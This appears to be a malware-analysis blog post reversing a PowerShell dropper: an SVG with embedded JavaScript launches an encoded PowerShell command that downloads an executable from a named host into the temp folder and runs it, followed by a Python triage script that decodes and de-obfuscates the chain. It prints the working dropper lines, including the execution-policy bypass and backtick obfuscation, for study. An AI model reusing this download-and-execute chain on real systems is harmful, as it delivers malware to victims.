Malware Safari: Reversing A Powershell Dropper

Recently I was reading a Twitter thread by @_mbanana about malware analysis and saw the website MalShare mentioned. To make a long story short, I signed up for an API key, and the first sample I saw had a PowerShell label. I decided to look into it and found a PowerShell dropper.

Overview

The chain started from a file served online that created an ActiveXObject, which in turn spawned a PowerShell dropper. The dropper then downloaded an executable from the URL https://cdn.filesend.jp/private/kO85h9cY6XXElZXVg-PK9KJX3TXoOnxMkTnVjca9hrJOUuGkw8PMomNdQ2OEcc2E/Secures.exe. That file has since been taken down by the hosting provider because it was known to be malicious, so the link no longer serves anything.

The initial part of the stager

The first part of the stager is an SVG file with JavaScript embedded inside of it. The embedded JavaScript is a fairly common one-liner used to get code execution outside of a browser: ActiveXObject only exists in the Windows Script Host and the legacy Internet Explorer engines, so the one-liner does nothing in a modern browser and only fires when the file is handled by one of those engines.

var r = new ActiveXObject("WScript.Shell").Run
("PowERsHELl.ExE -ExecutionPolicy bypass /e <base64 blob omitted>");

The JavaScript instantiates WScript.Shell through ActiveXObject and calls its Run method to launch powershell.exe with -ExecutionPolicy bypass and /e (the short form of -EncodedCommand) followed by a base64-encoded command. That encoded command is the second stage of the dropper.

The second stage of the dropper

After looking at the encoded command I copied the base64 blob into its own file, which I called dropper.b64, and decoded it with cat dropper.b64 | base64 -d, which produced the following PowerShell. (One caveat when doing this: -EncodedCommand takes base64 of UTF-16LE text, so a raw base64 decode contains a null byte after every character; converting the output from UTF-16LE to UTF-8 gives clean text.)

(NEw-objEct  `N`e`T`.`W`e`B`C`l`i`e`N`T )
.DownLoAdfIlE("https://cdn.filesend.jp/private/kO85h9cY6XXElZXVg-PK9KJX3TXoOnxMkTnVjca9hrJOUuGkw8PMomNdQ2OEcc2E/Secures.exe", "$ENv:temp\TNWwf.exe"); 
stARt  $ENv:temp\TNWwf.exe

The PowerShell is fairly straightforward: a .NET WebClient is created and used to download an executable into the user's temp directory as TNWwf.exe, and that file is then launched with start (an alias of Start-Process). The backticks and mixed case are light obfuscation: PowerShell is case-insensitive and drops a backtick that precedes a character which does not form an escape sequence, so `N`e`T`.`W`e`B`C`l`i`e`N`T resolves to Net.WebClient. And this is where the journey ends, because the cloud provider removed the malicious payload from their website. :)
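The chain described in the two stages above (the SVG script that calls WScript.Shell.Run, the /e encoded command, the UTF-16LE decoding caveat, and the backtick obfuscation), as a small triage script. This is an added example, not the author's tooling or the sample's code. The page does not reproduce the real base64 blob, so the script rebuilds a constructed one from the decoded stage-2 command shown above and wraps it in an SVG of the same shape as stage 1; the assumption is that the original blob encoded exactly that text. The Windows PowerShell escape table used for de-obfuscation is stated in the comments.

```python
"""Triage helper for the SVG -> WScript.Shell.Run -> powershell /e chain.
Added example, not the author's or the sample's code."""
import base64
import html
import re

# Constructed sample input. The page does not reproduce the real base64 blob,
# so we rebuild one from the decoded stage-2 command shown on the page and
# wrap it in an SVG of the same shape as stage 1 (assumption: the real blob
# encoded exactly this text; whitespace may have differed).
STAGE2_PS = (
    "(NEw-objEct  `N`e`T`.`W`e`B`C`l`i`e`N`T )"
    '.DownLoAdfIlE("https://cdn.filesend.jp/private/'
    'kO85h9cY6XXElZXVg-PK9KJX3TXoOnxMkTnVjca9hrJOUuGkw8PMomNdQ2OEcc2E/Secures.exe", '
    '"$ENv:temp\\TNWwf.exe"); stARt  $ENv:temp\\TNWwf.exe'
)


def encode_command(ps: str) -> str:
    """Build what powershell -EncodedCommand expects: base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


SAMPLE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg">\n'
    '<script type="text/javascript"><![CDATA[\n'
    'var r = new ActiveXObject("WScript.Shell").Run\n'
    '("PowERsHELl.ExE -ExecutionPolicy bypass /e ' + encode_command(STAGE2_PS) + '");\n'
    "]]></script>\n"
    "</svg>\n"
)

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
RUN_RE = re.compile(r'\.Run\s*\(\s*"((?:[^"\\]|\\.)*)"', re.S)
FLAG_RE = re.compile(r"(?<!\S)[-/]([A-Za-z]+)\s+(\S+)")
# Lowercase letters that form a real backtick escape in Windows PowerShell.
# `e became an escape only in PowerShell 6+, so for a sample that ran under
# Windows PowerShell it is just the letter e and the backtick is dropped.
PS_ESCAPES = set("0abfnrtv")


def find_encoded_blob(cmdline: str):
    """Return the -EncodedCommand argument, accepting any prefix PowerShell accepts
    (-e, -ec, -enc, /e, ...). -ExecutionPolicy is rejected because it is not a
    prefix of 'encodedcommand', so its value 'bypass' is never taken for a blob."""
    for m in FLAG_RE.finditer(cmdline):
        flag, value = m.group(1).lower(), m.group(2)
        if "encodedcommand".startswith(flag):
            return value
    return None


def decode_encoded_command(blob: str) -> str:
    """base64 -> UTF-16LE text. A plain `base64 -d` leaves a NUL byte after every
    character; decoding as UTF-16LE is what removes them."""
    blob = blob.strip("\"'")
    blob += "=" * (-len(blob) % 4)  # some droppers strip the base64 padding
    return base64.b64decode(blob).decode("utf-16-le")


def strip_backticks(ps: str) -> str:
    """Undo `N`e`T style obfuscation: a backtick before a character that is not an
    escape sequence is dropped by PowerShell, so `N`e`T`.`W`e`B`C`l`i`e`N`T is
    Net.WebClient. Real escapes (`n, `t, ...) are left untouched."""
    out = []
    i = 0
    while i < len(ps):
        if ps[i] == "`" and i + 1 < len(ps) and ps[i + 1] not in PS_ESCAPES:
            i += 1  # drop the backtick; the next character is kept as-is
            continue
        out.append(ps[i])
        i += 1
    return re.sub(r"[ \t]+", " ", "".join(out))


def extract_iocs(ps: str) -> dict:
    """Pull the download URL(s) and drop path(s) out of the cleaned command."""
    urls = re.findall(r"https?://[^\s\"'()]+", ps)
    paths = re.findall(r"\$env:\w+\\[^\s\"';()]+", ps, re.I)
    return {"urls": sorted(set(urls)), "paths": sorted(set(paths))}


def analyze_svg(svg_text: str) -> dict:
    """Walk the chain: <script> -> WScript.Shell.Run(...) -> -EncodedCommand -> IOCs."""
    for script in SCRIPT_RE.findall(svg_text):
        script = html.unescape(script).replace("<![CDATA[", "").replace("]]>", "")
        for cmdline in RUN_RE.findall(script):
            blob = find_encoded_blob(cmdline)
            if blob is None:
                continue
            decoded = decode_encoded_command(blob)
            clean = strip_backticks(decoded)
            return {"command_line": cmdline, "decoded": decoded,
                    "deobfuscated": clean, "iocs": extract_iocs(clean)}
    return {}


if __name__ == "__main__":
    report = analyze_svg(SAMPLE_SVG)
    print(report["deobfuscated"])
    print(report["iocs"])
```

Feeding the real SVG into analyze_svg would stop at the encoded command, the same place the write-up stops; the de-obfuscation step is deliberately conservative and only removes backticks it can prove are inert, so anything it leaves behind is worth a second look by hand.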

Ending notes

The dropper is initially staged by a bit of JavaScript embedded inside an SVG, which in turn spawns an encoded PowerShell command that downloads the payload into the temp directory and runs it. The payload itself has since been removed.